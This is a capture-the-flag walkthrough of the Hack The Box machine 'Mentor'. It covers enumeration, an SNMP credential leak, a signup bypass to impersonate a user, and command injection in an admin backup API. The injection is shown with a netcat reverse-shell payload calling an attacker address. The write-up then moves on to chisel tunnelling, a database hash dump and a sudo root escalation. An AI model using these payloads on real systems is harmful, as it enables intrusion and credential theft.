TCP Scan
> TARGET=10.129.85.27 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://mentorquotes.htb/
- Found domain:
mentorquotes.htb
Wen Enum
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://mentorquotes.htb/" -H "Host: FUZZ.mentorquotes.htb" --hl 9
000000051: 404 0 L 2 W 22 Ch "api"
> dirsearch -u http://api.mentorquotes.htb/
[19:48:13] 307 - 0B - /admin -> http://api.mentorquotes.htb/admin/
[19:48:15] 422 - 186B - /admin/
[19:48:15] 422 - 186B - /admin/?/login
[19:48:16] 307 - 0B - /admin/backup/ -> http://api.mentorquotes.htb/admin/backup
[19:48:38] 405 - 31B - /auth/login
[19:48:56] 200 - 969B - /docs
[19:48:56] 307 - 0B - /docs/ -> http://api.mentorquotes.htb/docs
[19:49:46] 403 - 285B - /server-status/
[19:49:46] 403 - 285B - /server-status
[19:50:03] 307 - 0B - /users -> http://api.mentorquotes.htb/users/
[19:50:03] 307 - 0B - /users/admin.php -> http://api.mentorquotes.htb/users/admin.php/
[19:50:03] 422 - 186B - /users/
[19:50:03] 307 - 0B - /users/admin -> http://api.mentorquotes.htb/users/admin/
[19:50:03] 307 - 0B - /users/login -> http://api.mentorquotes.htb/users/login/
[19:50:03] 307 - 0B - /users/login.php -> http://api.mentorquotes.htb/users/login.php/
[19:50:03] 307 - 0B - /users/login.aspx -> http://api.mentorquotes.htb/users/login.aspx/
[19:50:03] 307 - 0B - /users/login.html -> http://api.mentorquotes.htb/users/login.html/
[19:50:03] 307 - 0B - /users/login.jsp -> http://api.mentorquotes.htb/users/login.jsp/
[19:50:03] 307 - 0B - /users/login.js -> http://api.mentorquotes.htb/users/login.js/
- Browsing to
http://api.mentorquotes.htb/docs, found james’s email
james@mentorquotes.htb
Intended: snmpwalk
- There is a snmp service running on the target, hence perform a snmpwalk and found a credential
> snmpwalk -v2c -c internal mentorquotes.htb
iso.3.6.1.2.1.25.4.2.1.5.2045 = STRING: "/usr/local/bin/login.py k******************3"
- This is the credential for the user
james
Unintedned way: (Patched)
- Tampering with the method:
http://api.mentorquotes.htb/docs#/Auth/create_user_auth_signup_post with the following payload. We can register a user called james and provide our own email.
{
"email": "james@meow.com",
"username": "james",
"password": "test1234"
}
Login as james
- Now, we are able to login using
http://api.mentorquotes.htb/docs#/Auth/login_auth_login_post with the same payload and receive a token
# payload
{
"email": "james@mentorquotes.htb",
"username": "james",
"password": "<password>"
}
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW93LmNvbSJ9.uUc8K0Weo06PoaonawiZOo_wEcdQE8DWNSRXvrwSaGU
- And, we can query the
/admin section with the token just created
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}
- Checking the two paths under
/admin received the following responses:
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/check
{"details":"Not implemented yet!"}
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup
{"detail":"Method Not Allowed"}
# for a post request, this is the response
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}
# to make a backup, the expected payload format is
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d "{\"body\":\"test\",\"path\":\"test\"}"
- Further enum found that the
path parameter is vulnerable to cmd injection
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://<ip>`"}'
- This can be used to get a reverse shell
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <attacker-ip> 4444 >/tmp/f`"}'
/home/svc # cat user.txt
SSH access as svc
- Locate
/app_backkup.tar and examine the script /app/app/db.py found a connection string to db
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")
- Port forward the target port using chisel
# on kali
> chisel server -p 9999 --reverse
# on target
> chisel client --max-retry-count=1 <attacker-ip>:9999 R:55432:172.22.0.1:5432
- Login to the postgres db via the forwarded port and dump all user info
> psql -h 127.0.0.1 -p 55432 -Upostgres -W -d mentorquotes_db
mentorquotes_db=# \dt
List of relations
Schema | Name | Type | Owner
--------+----------+-------+----------
public | cmd_exec | table | postgres
public | quotes | table | postgres
public | users | table | postgres
(3 rows)
mentorquotes_db=# select * from users;
id | email | username | password
----+------------------------+-------------+----------------------------------
1 | james@mentorquotes.htb | james | 7ccdcd8c05b59add9c198d492b36****
2 | svc@mentorquotes.htb | service_acc | 53f22d0dfa10dce7e29cd31f4f95****
4 | james@meow.com | james | 16d7a4fca7442dda3ad93c9a726597e4
53f22d0dfa10dce7e29cd31f4f95**** can be cracked on https://crackstation.net/
- This can be used to login to the target via
ssh as svc
PE
- Examine
/etc/snmp/snmpd.conf for james’ password
createUser bootstrap MD5 ******************* DES
svc@mentor:~$ su - james
Password:
james@mentor:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on mentor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User james may run the following commands on mentor:
(ALL) /bin/sh
james@mentor:~$ sudo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
